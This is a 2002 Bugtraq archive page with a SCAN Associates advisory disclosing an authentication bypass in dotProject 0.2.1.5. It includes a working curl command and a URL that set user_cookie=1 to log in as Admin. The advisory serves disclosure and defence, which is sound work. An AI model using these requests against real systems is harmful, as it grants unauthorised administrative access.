Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

php dotProject by pass authentication

From: pokleyzz <pokleyzz () scan-associates net>
Date: Mon, 29 Jul 2002 11:19:14 +0800
SCAN Associates Sdn Bhd Security Advisory

Product: dotProject 0.2.1.5 (possibly other)

Vendor URL: http://www.dotmarketing.org/dotproject/
Summary: php dotProject by pass authentication 
Author: pokleyzz <pokleyzz () scan-associates net>, sk <sk () scan-associates net>,
shaharil <shaharil () scan-associates net>

Description
===========
dotProject is web base project management system . This application consider as beta version. 

Details
=======
Everyone can bypass authentication and login as Admin. It was rather simple to exploit, user may send a crafted cookie like: 

curl -b user_cookie=1 http://server/project/index.php?m=projects

Or simply append user_cookie=1 in any URL:

http://server/project/index.php?m=projects&user_cookie=1
Vendor Response =============== Vendor has been contacted on 24/7/2002 but no reply. 
www.scan-associates.net <http://www.scan-associates.net>
Previous By Date Next
Previous By Thread Next

Current thread: